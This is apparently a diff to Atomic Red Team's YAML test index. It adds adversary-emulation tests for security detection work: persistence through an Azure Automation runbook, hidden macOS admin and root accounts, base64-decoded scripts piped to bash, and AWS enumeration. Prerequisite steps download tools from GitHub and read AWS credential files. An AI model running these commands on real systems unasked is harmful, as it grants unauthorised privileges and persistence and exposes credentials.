          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
          if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -66016,6 +66477,55 @@ persistence:
          this atomic test : https://cloud.google.com/sdk/docs/install"

          '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -66704,6 +67214,45 @@ persistence:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
    - name: WinPwn - Loot local Credentials - powerhell kittie
      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
      description: Loot local Credentials - powerhell kittie technique via function
@@ -69950,7 +70499,7 @@ collection:
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
          Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
        cleanup_command: |
          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -84142,6 +84691,36 @@ discovery:
          -FilePath .\\CurrentUserObject.txt\n"
        cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force

+          '
+        name: powershell
+    - name: System Discovery - SocGholish whoami
+      auto_generated_guid: 3d257a03-eb80-41c5-b744-bb37ac7f65c7
+      description: "SocGholish performs whoami discovery commands and outputs the
+        results to a tmp file. \nThe test will generate a filename similar to the
+        random one generated during execution and write the file to AppData\\Temp.\n\nReference:
+        https://redcanary.com/threat-detection-report/threats/socgholish/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_path:
+          description: Location of output file
+          type: string
+          default: "$env:temp"
+      executor:
+        command: |
+          $TokenSet = @{
+            U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
+            N = [Char[]]'0123456789'
+          }
+          $Upper = Get-Random -Count 5 -InputObject $TokenSet.U
+          $Number = Get-Random -Count 5 -InputObject $TokenSet.N
+          $StringSet = $Upper + $Number
+          $rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
+          $file = "rad" + $rad + ".tmp"
+
+          whoami.exe /all >> #{output_path}\$file
+        cleanup_command: 'Remove-Item -Path $env:temp\rad*.tmp -Force
+
          '
        name: powershell
  T1613:
@@ -84708,10 +85287,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
          lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -84737,10 +85315,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc admincountdmp\n"
        name: command_prompt
@@ -84764,10 +85341,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=person)\n"
        name: command_prompt
@@ -84791,10 +85367,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc exchaddresses\n"
        name: command_prompt
@@ -84982,15 +85557,6 @@ discovery:
        code 4776 from the domain controller and stores the ouput in C:\\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)\n"
      supported_platforms:
      - windows
-      input_arguments:
-        Domain:
-          description: Domain that is being tested against
-          type: string
-          default: "$env:USERDOMAIN"
-        DomainController:
-          description: Domain Controller that is being tested against
-          type: string
-          default: "$env:UserDnsDomain"
      executor:
        command: wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security
          C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
@@ -85636,6 +86202,7 @@ discovery:
          '
        get_prereq_command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -87399,7 +87966,78 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1580
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
  T1217:
    technique:
      x_mitre_platforms:
@@ -87787,10 +88425,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=subnet)\n"
        name: command_prompt
@@ -88080,10 +88717,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
        name: command_prompt
@@ -88107,10 +88743,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -gcb -sc trustdmp\n"
        name: command_prompt
@@ -90363,10 +90998,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=computer)\n"
        name: command_prompt
@@ -90390,10 +91024,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

          '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -sc dclist\n"
        name: command_prompt
@@ -104257,6 +104890,55 @@ initial-access:
          this atomic test : https://cloud.google.com/sdk/docs/install"

          '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1566.003:
    technique:
      x_mitre_platforms:
@@ -104416,6 +105098,45 @@ initial-access:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
    - name: WinPwn - Loot local Credentials - powerhell kittie
      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
      description: Loot local Credentials - powerhell kittie technique via function
@@ -4192,6 +4192,52 @@ defense-evasion:
          echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
          echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
          echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+    - name: Linux Base64 Encoded Shebang in CLI
+      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+      description: "Using Linux Base64 Encoded shell scripts that have Shebang in
+        them. This is commonly how attackers obfuscate passing and executing a shell
+        script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
+        by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
+        Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
+        for it. \n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        bash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        dash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        fish_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        sh_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+      dependencies:
+      - description: 'base64 must be present
+
+          '
+        prereq_command: 'which base64
+
+          '
+        get_prereq_command: 'echo "please install base64"
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          echo #{bash_encoded} | base64 -d | bash
+          echo #{dash_encoded} | base64 -d | bash
+          echo #{fish_encoded} | base64 -d | bash
+          echo #{sh_encoded} | base64 -d | bash
  T1562:
    technique:
      x_mitre_platforms:
@@ -31059,6 +31105,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -58111,7 +58158,78 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1580
+    atomic_tests:
+    - name: AWS - EC2 Enumeration from Cloud Instance
+      auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+      description: 'This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets,
+        iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails,
+        ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors)
+        from the context of an EC2 instance role. This simulates an attacker compromising
+        an EC2 instance and running initial discovery commands on it. This atomic
+        test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team).
+        Stratus Red Team is a self-contained binary. You can use it to easily detonate
+        offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+        '
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        stratus_path:
+          description: Path of stratus binary
+          type: path
+          default: "$PathToAtomicsFolder/T1580/src"
+        aws_region:
+          description: AWS region to detonate
+          type: string
+          default: us-west-2
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
+
+          '
+        prereq_command: 'if test -f "#{stratus_path}/stratus"; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: "if [ \"$(uname)\" = \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
+          [ \"$(expr substr $(uname) 1 5)\" = \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
+          -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
+          | grep browser_download_url | grep -i linux_x86_64 | cut -d '\"' -f 4);
+          wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n
+          \ tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi
+          \n"
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+          '
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+          '
+        get_prereq_command: 'echo "Please install the aws-cli and configure your AWS
+          default profile using: aws configure"
+
+          '
+      executor:
+        command: |
+          export AWS_REGION=#{aws_region}
+          cd #{stratus_path}
+          echo "Stratus: Start Warmup."
+          ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+          echo "Stratus: Start Detonate."
+          ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+        cleanup_command: |
+          cd #{stratus_path}
+          echo "Stratus: Start Cleanup."
+          ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+          echo "Removing Stratus artifacts from local machine."
+          rm -rf stratus*
+        name: sh
+        elevation_required: false
  T1217:
    technique:
      x_mitre_platforms:
@@ -3845,6 +3845,52 @@ defense-evasion:
          echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
          echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
          echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+    - name: Linux Base64 Encoded Shebang in CLI
+      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+      description: "Using Linux Base64 Encoded shell scripts that have Shebang in
+        them. This is commonly how attackers obfuscate passing and executing a shell
+        script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
+        by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
+        Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
+        for it. \n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        bash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        dash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        fish_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        sh_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+      dependencies:
+      - description: 'base64 must be present
+
+          '
+        prereq_command: 'which base64
+
+          '
+        get_prereq_command: 'echo "please install base64"
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          echo #{bash_encoded} | base64 -d | bash
+          echo #{dash_encoded} | base64 -d | bash
+          echo #{fish_encoded} | base64 -d | bash
+          echo #{sh_encoded} | base64 -d | bash
  T1562:
    technique:
      x_mitre_platforms:
@@ -16383,6 +16429,45 @@ defense-evasion:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
  T1211:
    technique:
      x_mitre_platforms:
@@ -26923,6 +27008,45 @@ privilege-escalation:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
  T1574.012:
    technique:
      x_mitre_platforms:
@@ -29827,6 +29951,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
